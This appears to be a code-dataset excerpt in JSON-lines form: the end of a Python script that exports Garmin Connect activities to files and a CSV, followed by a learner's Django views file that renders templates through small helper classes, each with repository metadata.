http_caller(f'{URL_GC_ACTIVITY}{activity_id}')\n        details = json.loads(activity_details)\n        if details['summaryDTO']:\n            tries = 0\n        else:\n            logging.info('Retrying activity details download %s', URL_GC_ACTIVITY + str(activity_id))\n            tries -= 1\n            if tries == 0:\n                raise Exception(f\"Didn't get 'summaryDTO' after {MAX_TRIES} tries for {activity_id}.\")\n    return activity_details, details\n
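\n\n# Illustrative usage (the activity ID below is hypothetical): fetch_details() returns the raw JSON string alongside the parsed dict, so callers can archive one and work with the other:\n#   raw_json, parsed = fetch_details('1234567890', http_req_as_string)\n#   write_to_file('activity_1234567890.json', raw_json, 'w')\n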
\n\ndef copy_details_to_summary(summary, details):\n    \"\"\"\n    Add some activity properties from the 'details' dict to the 'summary' dict. The choice of which properties are copied is determined\n    by the properties used by the 'csv_write_record' function.\n    :param summary: summary dict, will be modified in-place\n    :param details: details dict\n    \"\"\"\n    summary['activityId'] = details['activityId']\n    summary['activityName'] = details['activityName']\n    summary['description'] = details['description'] if present('description', details) else None\n    summary['activityType'] = {}\n    summary['activityType']['typeId'] = details['activityTypeDTO']['typeId'] if 'activityTypeDTO' in details and present('typeId', details['activityTypeDTO']) else None\n    summary['activityType']['typeKey'] = details['activityTypeDTO']['typeKey'] if 'activityTypeDTO' in details and present('typeKey', details['activityTypeDTO']) else None\n    summary['activityType']['parentTypeId'] = details['activityTypeDTO']['parentTypeId'] if 'activityTypeDTO' in details and present('parentTypeId', details['activityTypeDTO']) else None\n    summary['eventType'] = {}\n    summary['eventType']['typeKey'] = details['eventType']['typeKey'] if 'eventType' in details and present('typeKey', details['eventType']) else None\n    summary['startTimeLocal'] = details['summaryDTO']['startTimeLocal'] if 'summaryDTO' in details and 'startTimeLocal' in details['summaryDTO'] else None\n    summary['startTimeGMT'] = details['summaryDTO']['startTimeGMT'] if 'summaryDTO' in details and 'startTimeGMT' in details['summaryDTO'] else None\n    summary['duration'] = details['summaryDTO']['duration'] if 'summaryDTO' in details and 'duration' in details['summaryDTO'] else None\n    summary['distance'] = details['summaryDTO']['distance'] if 'summaryDTO' in details and 'distance' in details['summaryDTO'] else None\n    summary['averageSpeed'] = details['summaryDTO']['averageSpeed'] if 'summaryDTO' in details and 'averageSpeed' in details['summaryDTO'] else None\n    summary['maxHR'] = details['summaryDTO']['maxHR'] if 'summaryDTO' in details and 'maxHR' in details['summaryDTO'] else None\n    summary['averageHR'] = details['summaryDTO']['averageHR'] if 'summaryDTO' in details and 'averageHR' in details['summaryDTO'] else None\n    summary['elevationCorrected'] = details['metadataDTO']['elevationCorrected'] if 'metadataDTO' in details and 'elevationCorrected' in details['metadataDTO'] else None\n\ndef main(args):\n    \"\"\"\n    Main entrypoint for the script.\n    \"\"\"\n    args = parse_arguments(args)\n    setup_logging(args)\n    logging.info(\"Starting %s version %s, using Python version %s\", sys.argv[0], SCRIPT_VERSION, python_version())\n    logging_verbosity(args.verbosity)\n\n    print('Welcome to Garmin Connect Exporter')\n\n    if sys.version_info.major < 3:\n        print('Please upgrade to Python 3.x;', 'version', python_version(), \"isn't supported anymore.\")\n        sys.exit(1)\n\n    # Get filter list with IDs to exclude\n    if args.exclude is not None:\n        exclude_list = read_exclude(args.exclude)\n        if exclude_list is None:\n            sys.exit(1)\n    else:\n        exclude_list = []\n\n    if os.path.isdir(args.directory):\n        logging.warning('Output directory %s already exists. Will skip already-downloaded files and append to the CSV file.', args.directory)\n
    else:\n        os.mkdir(args.directory)\n\n    login_to_garmin_connect(args)\n\n    csv_filename = args.directory + '/activities.csv'\n    csv_existed = os.path.isfile(csv_filename)\n\n    csv_file = open(csv_filename, mode='a', encoding='utf-8')\n    csv_filter = CsvFilter(csv_file, args.template)\n\n    # write header to CSV file\n    if not csv_existed:\n        csv_filter.write_header()\n\n    # Query the userstats (activity totals on the profile page); they are needed for filtering and for downloading 'all'\n    userstats_json = fetch_userstats(args)\n\n    if args.count == 'all':\n        total_to_download = int(userstats_json['userMetrics'][0]['totalActivities'])\n    else:\n        total_to_download = int(args.count)\n\n    device_dict = dict()\n\n    activity_type_properties = http_req_as_string(URL_GC_ACT_PROPS)\n    if args.verbosity > 0:\n        write_to_file(os.path.join(args.directory, 'activity_types.properties'), activity_type_properties, 'w')\n    activity_type_name = load_properties(activity_type_properties)\n    event_type_properties = http_req_as_string(URL_GC_EVT_PROPS)\n    if args.verbosity > 0:\n        write_to_file(os.path.join(args.directory, 'event_types.properties'), event_type_properties, 'w')\n    event_type_name = load_properties(event_type_properties)\n\n    activities = fetch_activity_list(args, total_to_download)\n    action_list = annotate_activity_list(activities, args.start_activity_no, exclude_list)\n\n    for item in action_list:\n        current_index = item['index'] + 1\n        activity = item['activity']\n        action = item['action']\n\n        # Action: skipping\n        if action == 's':\n            print('Skipping : Garmin Connect activity ', end='')\n            print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}]\")\n            continue\n\n        # Action: excluding\n        if action == 'e':\n            print('Excluding : Garmin Connect activity ', end='')\n            print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}]\")\n            continue\n\n        # Action: download\n        print('Downloading: Garmin Connect activity ', end='')\n        print(f\"({current_index}/{len(action_list)}) [{activity['activityId']}] {activity['activityName']}\")\n\n        # Also retrieve the detail data of the activity\n        activity_details, details = fetch_details(activity['activityId'], http_req_as_string)\n\n        extract = {}\n        extract['start_time_with_offset'] = offset_date_time(activity['startTimeLocal'], activity['startTimeGMT'])\n        elapsed_duration = details['summaryDTO']['elapsedDuration'] if 'summaryDTO' in details and 'elapsedDuration' in details['summaryDTO'] else None\n        extract['elapsed_duration'] = elapsed_duration if elapsed_duration else activity['duration']\n        extract['elapsed_seconds'] = int(round(extract['elapsed_duration']))\n        extract['end_time_with_offset'] = extract['start_time_with_offset'] + timedelta(seconds=extract['elapsed_seconds'])\n\n        print('\\t', extract['start_time_with_offset'].isoformat(), ', ', sep='', end='')\n        print(hhmmss_from_seconds(extract['elapsed_seconds']), ', ', sep='', end='')\n        if 'distance' in activity and isinstance(activity['distance'], float):\n            print(\"{0:.3f}\".format(activity['distance']/1000), 'km', sep='')\n        else:\n            print('0.000 km')\n\n        if args.desc is not None:\n            append_desc = '_' + sanitize_filename(activity['activityName'], args.desc)\n        else:\n            append_desc = ''\n\n        if args.originaltime:\n            start_time_seconds = epoch_seconds_from_summary(activity)\n        else:\n            start_time_seconds = None\n\n        extract['device'] = extract_device(device_dict, details, start_time_seconds, args, http_req_as_string, write_to_file)\n
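\n        # Each enrichment below first checks csv_filter.is_column_active(), so the extra HTTP requests for samples, gear and HR zones are only made when the CSV template actually uses those columns.\n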
        # try to get the JSON with all the samples\n        extract['samples'] = None\n        if csv_filter.is_column_active('sampleCount'):\n            try:\n                activity_measurements = http_req_as_string(f\"{URL_GC_ACTIVITY}{activity['activityId']}/details\")\n                write_to_file(os.path.join(args.directory, f\"activity_{activity['activityId']}_samples.json\"), activity_measurements, 'w', start_time_seconds)\n                samples = json.loads(activity_measurements)\n                extract['samples'] = samples\n            except HTTPError:\n                pass\n\n        extract['gear'] = None\n        if csv_filter.is_column_active('gear'):\n            extract['gear'] = load_gear(str(activity['activityId']), args)\n\n        extract['hrZones'] = HR_ZONES_EMPTY\n        if csv_filter.is_column_active('hrZone1Low') or csv_filter.is_column_active('hrZone1Seconds'):\n            extract['hrZones'] = load_zones(str(activity['activityId']), start_time_seconds, args, http_req_as_string, write_to_file)\n\n        # Save the file and log if it already existed; if so, do not append the record to the CSV\n        if export_data_file(str(activity['activityId']), activity_details, args, start_time_seconds, append_desc, activity['startTimeLocal']):\n            csv_write_record(csv_filter, extract, activity, details, activity_type_name, event_type_name)\n\n    csv_file.close()\n\n    if args.external:\n        print('Open CSV output')\n        print(csv_filename)\n        call([args.external, \"--\" + args.args, csv_filename])\n\n    print('Done!')\n\nif __name__ == \"__main__\":\n    try:\n        main(sys.argv)\n    except KeyboardInterrupt:\n        print('Interrupted')\n        sys.exit(0)\n", "repo_name": "krzliszka/garmin-export", "sub_path": "export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 61539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "http.cookiejar.cookiejar.CookieJar", "line_number": 41, "usage_type": "call"}, {"api_name": "http.cookiejar.cookiejar", "line_number": 41, "usage_type": "attribute"}, {"api_name": "http.cookiejar", "line_number": 41, "usage_type": "name"}, {"api_name": "urllib.request.build_opener", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 42, "usage_type": "attribute"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 42, "usage_type": "call"}, {"api_name": "urllib.request.HTTPSHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 49, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 78, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 142, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 155, "usage_type": "call"}, {"api_name": "unicodedata.normalize", "line_number": 172, "usage_type": "call"}, {"api_name": "io.open", "line_number": 187, "usage_type": "call"}, {"api_name": "io.open", "line_number": 191, "usage_type": "call"}, {"api_name": "os.utime", "line_number": 197, "usage_type": "call"}, {"api_name": 
"urllib.request.Request", "line_number": 208, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 217, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 219, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 223, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 225, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 226, "usage_type": "call"}, {"api_name": "urllib.error.URLError", "line_number": 228, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 230, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 232, "usage_type": "call"}, {"api_name": "timeit.default_timer", "line_number": 232, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 233, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.tzinfo", "line_number": 319, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 326, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 337, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 357, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 363, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 363, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 377, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 416, "usage_type": "call"}, {"api_name": "csv.QUOTE_ALL", "line_number": 416, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 449, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 449, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 452, "usage_type": "call"}, {"api_name": "getpass.getpass", "line_number": 498, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 500, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 500, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 504, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 507, "usage_type": "call"}, {"api_name": "os.path", "line_number": 507, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 509, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 525, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 529, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 531, "usage_type": "call"}, {"api_name": "os.path", "line_number": 531, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 534, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 534, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 534, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 542, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 556, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 672, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 688, "usage_type": "call"}, {"api_name": "os.path", "line_number": 688, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 690, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 693, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 697, "usage_type": "call"}, {"api_name": "os.path.join", 
"line_number": 714, "usage_type": "call"}, {"api_name": "os.path", "line_number": 714, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 715, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 717, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 734, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 737, "usage_type": "call"}, {"api_name": "os.path", "line_number": 737, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 740, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 743, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 744, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 768, "usage_type": "call"}, {"api_name": "os.path", "line_number": 768, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 769, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 779, "usage_type": "call"}, {"api_name": "os.path", "line_number": 779, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 783, "usage_type": "call"}, {"api_name": "os.path", "line_number": 783, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 787, "usage_type": "call"}, {"api_name": "os.path", "line_number": 787, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 789, "usage_type": "call"}, {"api_name": "os.path", "line_number": 789, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 793, "usage_type": "call"}, {"api_name": "os.path", "line_number": 793, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 798, "usage_type": "call"}, {"api_name": "os.path", "line_number": 798, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 799, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 803, "usage_type": "call"}, {"api_name": "os.path", "line_number": 803, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 804, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 811, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 813, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 816, "usage_type": "call"}, {"api_name": "filtering.update_download_stats", "line_number": 825, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 830, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 830, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 831, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 833, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 836, "usage_type": "call"}, {"api_name": "os.path", "line_number": 836, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 839, "usage_type": "call"}, {"api_name": "os.path", "line_number": 839, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 840, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 841, "usage_type": "call"}, {"api_name": "os.utime", "line_number": 843, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 847, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 857, "usage_type": "call"}, {"api_name": "os.path", "line_number": 857, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 858, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 860, "usage_type": "call"}, {"api_name": 
"os.path.join", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 862, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 867, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 868, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 869, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 871, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 878, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 880, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 881, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 881, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 883, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 883, "usage_type": "call"}, {"api_name": "logging.StreamHandler", "line_number": 884, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 885, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 887, "usage_type": "call"}, {"api_name": "logging.getLevelName", "line_number": 887, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 897, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 900, "usage_type": "call"}, {"api_name": "os.path", "line_number": 900, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 906, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 910, "usage_type": "call"}, {"api_name": "os.path", "line_number": 910, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 912, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 923, "usage_type": "call"}, {"api_name": "re.MULTILINE", "line_number": 923, "usage_type": "attribute"}, {"api_name": "re.DOTALL", "line_number": 923, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 953, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 989, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 989, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 990, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 996, "usage_type": "call"}, {"api_name": "os.path", "line_number": 996, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 997, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1020, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1020, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 1037, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1041, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 1079, "usage_type": "call"}, {"api_name": "platform.python_version", "line_number": 1079, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 1084, "usage_type": "attribute"}, {"api_name": "platform.python_version", "line_number": 1085, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1086, "usage_type": "call"}, {"api_name": "filtering.read_exclude", "line_number": 1090, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1092, "usage_type": "call"}, {"api_name": 
"os.path.isdir", "line_number": 1096, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1096, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 1097, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 1099, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 1104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1104, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1125, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 1164, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 1190, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1190, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 1191, "usage_type": "call"}, {"api_name": "urllib.error.HTTPError", "line_number": 1193, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 1213, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1222, "usage_type": "call"}]} +{"seq_id": "73829928166", "text": "# from django.shortcuts import render\n\n# Create your views here.\n\n\n\n# from django.shortcuts import render\n\n# Create your views here.\n\n# -----(其他)---------\n# 時間需要\nfrom datetime import datetime\nfrom re import template\n# 用 model\nfrom app2.models import Post, Product\n# ---------------------------------------\n## 寫法<2> 使用 render 直接簡短渲染寫法\nfrom django.shortcuts import render\n## render 與底下的 HttpResponse 將會將\n## templete 抓來用,再回傳給使用者\n# ----------------------------------------\n ## 寫法<3> 使用到 get_template & HttpResponse\n ## 當你這個 view 有很多 templete 時候 get_template 可以幫你選版 通常是中間的 base.html\n ## 再用 HttpResponse(html) 去把你要的畫面拼出來\nfrom django.template.loader import get_template\nfrom django.http import HttpResponse\n##################################\n# Create your views here. #\n##################################\n## 寫法<1> 直接印 html\ndef pageApp2(request):\n html = '''\n

    This is a test page App2....\n\n    ~~~~~~~~~~~~~~~~~~~~~~~~\n\n    tryyyyyyyyyyyyyyyyyyy\n\n    TEST
    \n '''\n    link_admin = True\n    if link_admin:\n        template = get_template('index.html')\n        content_posts = Post.objects.all()\n        now = datetime.now()\n        html = template.render(locals())\n        return HttpResponse(html)\n    else:\n        return HttpResponse(html)\n\n# \"\"\"\n\nclass BaseHtmlTemplate:\n    # step1\n    def __init__(self, link_admin, html, SourceTemplat):\n        self.link_admin = True\n        self.html = ''\n        self.SourceTemplat = 'index.html'\n\n        self.link_admin = link_admin\n        self.html = html\n        if SourceTemplat != '':\n            self.SourceTemplat = SourceTemplat\n    # step3 (run it from outside)\n    # base template\n    def exc_render(self):\n        html = self.html\n        if self.link_admin:\n            # template = get_template('index.html')\n            SourceTemplat = self.SourceTemplat\n            template = get_template(SourceTemplat)\n            # content_posts = Product.objects.all()\n            # now = datetime.now()\n            Dictlocals = locals()\n            self.GetContent()\n            Dictlocals.update(self.dictUpdateValue)\n            # html = template.render(locals())\n            html = template.render(Dictlocals)\n            # print(Dictlocals)\n            # return HttpResponse(html)\n        else:\n            # return HttpResponse(html)\n            pass\n        self.html = html\n    # step2 (don't use it from outside)\n    # DLC\n    def GetContent(self):\n        content_posts = Product.objects.all()\n        # content_posts = Product.objects.all()[:2]\n        now = datetime.now()\n        dictUpdateValue = {\n            \"content_posts\" : content_posts,\n            \"now\" : now\n        }\n        self.dictUpdateValue = dictUpdateValue\n    def get_render_result(self):\n        return self.html\n# Inherits the class above; inherited methods can be overridden (define a def with the same name)\nclass NeoHtmlTemplate(BaseHtmlTemplate):\n    # def GetContent(self):\n    #     return super().GetContent()\n\n    def GetContent(self):\n        # content_posts = Product.objects.all()\n        content_posts = Product.objects.all()[:2]\n        now = datetime.now()\n        dictUpdateValue = {\n            \"content_posts\" : content_posts,\n            \"now\" : now\n        }\n        self.dictUpdateValue = dictUpdateValue\n
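\n# Illustrative sketch (not part of the original file; the class name is hypothetical): a new page only\n# needs to subclass BaseHtmlTemplate and override GetContent() to fill self.dictUpdateValue, e.g.\n#   class LatestPostTemplate(BaseHtmlTemplate):\n#       def GetContent(self):\n#           self.dictUpdateValue = {\"content_posts\": Product.objects.all()[:1], \"now\": datetime.now()}\n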
\nclass FormTemplate(BaseHtmlTemplate):\n    def GetContent(self):\n        if self.request.method == 'POST':\n            message = ''\n        else:\n            message = f\"Thanks for your message; the value was passed via: {self.request.method}\"\n        log = \"\"\"\n        Originally meant to write a simple app as a form example, but it is unfinished (for now values can only be passed inside the view, and POST does not pass values successfully).\n        This page renders rather badly; a template still needs to be applied later.\n        \"\"\"\n        dictUpdateValue = {\n            \"message\" : message,\n            \"Log\" : log,\n            \"user_name\" : \"Andy6\",\n            \"user_city\" : \"user city\",\n            \"user_school\" : \"NCHU\",\n            \"user_email\" : \"XXX@gmail.com\",\n            \"user_message\" : \"Talk ........\",\n        }\n        self.dictUpdateValue = dictUpdateValue\n\n# Now that the class version exists, the def below can be deleted\ndef repeat_code(link_admin=True, html='', SourceTemplat='index.html', List=None):\n    \n    if link_admin:\n        # template = get_template('index.html')\n\n        template = get_template(SourceTemplat)\n        content_posts = Product.objects.all()\n        now = datetime.now()\n        html = template.render(locals())\n        # return HttpResponse(html)\n    else:\n        # return HttpResponse(html)\n        pass\n    return html\n# \"\"\"\ndef ntab1(request):\n    html = '''\n

    A page just a tiny bit more formal than the earlier test page.... (under maintenance)

    \n '''\n    link_admin = True\n    # SourceTemplat = 'try_bootstrap.html'\n    SourceTemplat = 'index.html'\n\n    BaseTemplate = True\n    if BaseTemplate: \n        MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n    else:\n        MyObjTemplat = NeoHtmlTemplate(link_admin, html, SourceTemplat)\n    MyObjTemplat.exc_render()\n    html = MyObjTemplat.get_render_result()\n\n    # html = repeat_code(link_admin, html, SourceTemplat)\n\n    ## template = get_template(SourceTemplat)\n    ## html = template.render(locals())\n    return HttpResponse(html)\n\n# \"\"\"\nimport random\ndef about(request):\n    quotes = [\n        \"Finish today's tasks today\",\n        \"As you sow, so shall you reap\",\n        \"Knowledge is power\",\n        \"A person's character is their destiny\"\n    ]\n    quote = random.choice(quotes)\n    return render(request, 'about.html', locals())\n\n\ndef LISTING(request, yr, mon, day):\n    html = \"

    List Date is {}/{}/{}


    \".format(yr, mon, day)\n return HttpResponse(html)\n\ndef listing(request):\n html = '''\n

    Django variable passing: under maintenance !!!!

    \n '''\n # print(html)\n\n link_admin = True\n SourceTemplat = ''\n SourceTemplat = 'contact.html'\n # html = repeat_code(link_admin, html)\n\n BaseTemplate = False\n if BaseTemplate: \n MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n else:\n MyObjTemplat = FormTemplate(link_admin, html, SourceTemplat)\n MyObjTemplat.request = request\n MyObjTemplat.exc_render()\n html = MyObjTemplat.get_render_result()\n print(html)\n\n\n return HttpResponse(html)\n\ndef bootstrap(request):\n html = '''\n

    Bootstrap template integration: under maintenance !!!!

    \n '''\n    link_admin = True\n    # SourceTemplat = 'try_bootstrap.html'\n    SourceTemplat = 'Bbase.html'\n    # MyObjTemplat = BaseHtmlTemplate(link_admin, html, SourceTemplat)\n    # MyObjTemplat.exc_render()\n    # html = MyObjTemplat.get_render_result()\n\n    MyObjTemplat = NeoHtmlTemplate(link_admin, html, SourceTemplat)\n    MyObjTemplat.exc_render()\n    html = MyObjTemplat.get_render_result()\n\n    # html = repeat_code(link_admin, html, SourceTemplat)\n\n    ## template = get_template(SourceTemplat)\n    ## html = template.render(locals())\n    return HttpResponse(html)\n\n\n### Approach <2>: render with render()\n#def homepage(request):\n#    content_posts = Post.objects.all()\n    # content_posts = Post.objects.all()[0:3] ## pick a few items from the list\n#    now = datetime.now()\n#    return render(request, 'index.html', locals())\n# --------------------------------------------------------\n## Approach <3>: print it out via html\n", "repo_name": "ESSO0428/230111_django_class", "sub_path": "myFirstTemplate_230226/app2/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.template", "line_number": 46, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 46, "usage_type": "call"}, {"api_name": "app2.models.Post.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "app2.models.Post.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "app2.models.Post", "line_number": 47, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "name"}, {"api_name": "re.template.render", "line_number": 49, "usage_type": "call"}, {"api_name": "re.template", "line_number": 49, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 50, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 52, "usage_type": "call"}, {"api_name": "re.template", "line_number": 74, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 74, "usage_type": "call"}, {"api_name": "re.template.render", "line_number": 81, "usage_type": "call"}, {"api_name": "re.template", "line_number": 81, "usage_type": "name"}, {"api_name": "app2.models.Product.objects.all", "line_number": 91, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "app2.models.Product", "line_number": 91, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 93, "usage_type": "name"}, {"api_name": "app2.models.Product.objects.all", "line_number": 108, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "app2.models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 109, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 109, "usage_type": "name"}, {"api_name": "re.template", "line_number": 144, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 144, "usage_type": "call"}, {"api_name": "app2.models.Product.objects.all", "line_number": 145, "usage_type": "call"}, {"api_name": "app2.models.Product.objects", "line_number": 145, "usage_type": "attribute"}, {"api_name": 
